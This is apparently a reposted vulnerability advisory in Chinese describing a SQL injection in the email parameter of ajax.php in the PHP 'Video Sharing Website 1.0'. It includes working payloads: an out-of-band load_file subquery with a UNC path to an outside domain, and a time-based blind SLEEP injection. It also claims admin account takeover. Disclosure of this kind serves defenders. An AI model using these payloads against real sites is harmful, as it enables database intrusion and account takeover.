视频共享网站 1.0 SQL - 注入

2021-12-22 14:45:12 浏览数 (1)

供应商:https://www.sourcecodester.com/users/tips23

软件:https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html

描述:

来自视频共享网站 1.0 的 `ajax.php` 应用程序的 `email` 参数 似乎容易受到 SQL 注入攻击。

有效载荷 ' (select load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq')) ' 是在 email 参数中提交的。

此有效负载注入调用 MySQL 的 load_file 的 SQL 子查询 具有引用外部 URL 的 UNC 文件路径的函数 领域。

应用程序与该域交互,表明 执行了注入的 SQL 查询。攻击者可以采取管理员 此系统上的帐户控制。

代码语言:javascript复制
```mysql
---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=jsmith@sample.com' (select
load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq')) ''
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND
'yreq'='yreq&password=jsmith123
---

重现: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)

证明和利用: [href](https://streamable.com/4x2rfk)

0 人点赞